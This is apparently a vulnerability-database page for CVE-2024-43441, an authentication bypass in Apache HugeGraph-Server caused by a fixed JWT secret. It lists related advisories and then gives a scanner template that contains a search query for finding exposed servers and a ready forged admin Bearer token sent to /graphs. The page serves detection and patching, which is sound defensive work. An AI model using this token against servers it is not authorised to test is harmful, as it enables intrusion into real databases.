| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| The vulnerability of the Apache HugeGraph graph database server lies in the ability to bypass authentication by using data that is assumed to be unchangeable. This allows attackers to execute arbitrary code. | 21 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-43441 | 24 Dec 202412:15 | – | circl | |
| Apache HugeGraph 安全漏洞 | 24 Dec 202400:00 | – | cnnvd | |
| CVE-2024-43441 | 24 Dec 202411:59 | – | cve | |
| CVE-2024-43441 Apache HugeGraph-Server: Fixed JWT Token(Secret) | 24 Dec 202411:59 | – | cvelist | |
| Apache HugeGraph-Server: Fixed JWT Token (Secret) | 24 Dec 202412:30 | – | github | |
| CVE-2024-43441 | 24 Dec 202412:15 | – | nvd | |
| GHSA-F697-GM3H-XRF9 Apache HugeGraph-Server: Fixed JWT Token (Secret) | 24 Dec 202412:30 | – | osv | |
| PT-2024-10202 · Apache · Apache Hugegraph-Server | 13 Aug 202400:00 | – | ptsecurity | |
| CVE-2024-43441 | 23 May 202506:36 | – | redhatcve |
id: CVE-2024-43441
info:
name: Apache HugeGraph-Server <1.5.0 - Authentication Bypass
author: wn147
severity: critical
description: |
Apache HugeGraph-Server versions prior to 1.5.0 contain an authentication bypass vulnerability caused by assumed-immutable data. This flaw allows attackers to bypass authentication mechanisms without requiring specific privileges or user interaction.
impact: |
Attackers can bypass authentication, gaining unauthorized access to sensitive data or functionalities.
remediation: |
Upgrade to Apache HugeGraph-Server version 1.5.0 or later.
reference:
- https://github.com/advisories/GHSA-f697-gm3h-xrf9
- https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
- https://lists.apache.org/thread/h2607yv32wgcrywov960jpxhvsmmlf12
- http://www.openwall.com/lists/oss-security/2024/12/24/2
- https://github.com/J1ezds/Vulnerability-Wiki-page
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43441
cwe-id: CWE-302
epss-score: 0.69651
epss-percentile: 0.99284
metadata:
verified: true
max-request: 2
vendor: apache
product: hugegraph
fofa-query: title="HugeGraph"
tags: cve,cve2024,hugegraph,auth-bypass,apache,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /graphs HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 401'
internal: true
- raw:
- |
GET /graphs HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjIwNzE0NzY4MzB9.vb193qf4xpIPFcmCN8J0sRwqUaoS2RAUvFx9uLC-I7Q
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"graphs", "hugegraph")'
- 'contains(header, "application/json")'
condition: and
# digest: 490a004630440220019081e34af221058bca167d6b9cde5af80cbeb99d229a427ddee99acfd272a2022063efb5e6f7777ad3b12cdff9649ba74616442e164ea4c7ed899945db7cd829ef:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation